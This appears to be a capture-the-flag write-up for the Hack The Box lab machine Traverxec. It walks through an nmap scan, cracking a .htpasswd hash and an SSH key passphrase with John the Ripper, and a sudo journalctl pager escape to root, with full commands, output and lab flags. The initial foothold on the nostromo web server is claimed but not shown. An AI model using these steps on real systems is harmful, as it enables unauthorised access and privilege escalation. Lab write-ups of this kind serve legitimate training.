Traverxec is a box labeled Easy where the initial foothold is established by exploiting of improper security settings, followed by leveraging of a UNIX binary to bypass local security restrictions.
Enumeration reveals two open ports: SSH and HTTP.
root@kali:~/projects/Traverxec# nmap -sS -Pn -A 10.10.10.165
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-23 05:25 EST
Nmap scan report for 10.10.10.165
Host is up (0.021s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Browsing to http://10.10.10.165/img/portfolio/ we notice webpage is using nostromo 1.9.6
Run Linenum and notice a http password
[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
Break it with john. Password is Nowonly4me
root@kali:~/projects/Traverxec# /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me (david)
Found a backup of the SSH public and private keys in tmp/.fuckoff
Convert the RSA key to a format that’s recognizable by John
root@kali:~/projects/Traverxec/keys# /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
Break the password using John. Password is hunter
root@kali:~/projects/Traverxec/keys# /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:05 DONE (2019-11-24 12:10) 0.1949g/s 2795Kp/s 2795Kc/s 2795KC/sa6_123..*7¡Vamos!
Session completed
Login using the key and password. Collect the user hash
# ssh -i id_rsa david@10.10.10.165
david@traverxec:~$ cat ~/user.txt
7db0b48469606a42cec20750d9782f3d
Visit https://gtfobins.github.io/ - this is a curated list of UNIX binaries that can be exploited by an attacker to bypass local security restrictions. It's a resources that I've used countless times and I recommend it to anyone preparing for certification exams.
Script server-stats.sh located in /home/david/bin/ contains a command executed using sudo. It’s vulnerable to breaking out from the restricted environment.
https://gtfobins.github.io/gtfobins/journalctl/
david@traverxec:~/bin$ ls ~/bin/server-stats.sh
/home/david/bin/server-stats.sh
david@traverxec:~/bin$ tail
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
Invoke the command and break out from the restriced env
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sun 2019-11-24 13:32:42 EST, end at Sun 2019-11-24 13:40:20 EST. --
Nov 24 13:39:48 traverxec sudo[24788]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/11 ruser=www-data r
Nov 24 13:39:50 traverxec sudo[24788]: pam_unix(sudo:auth): conversation failed
Nov 24 13:39:50 traverxec sudo[24788]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Nov 24 13:39:50 traverxec sudo[24788]: www-data : command not allowed ; TTY=pts/11 ; PWD=/tmp ; USER=root ; COMMAND=list
Nov 24 13:40:08 traverxec crontab[25707]: (www-data) LIST (www-data)
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
Get the root user flag located in folder /root
# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906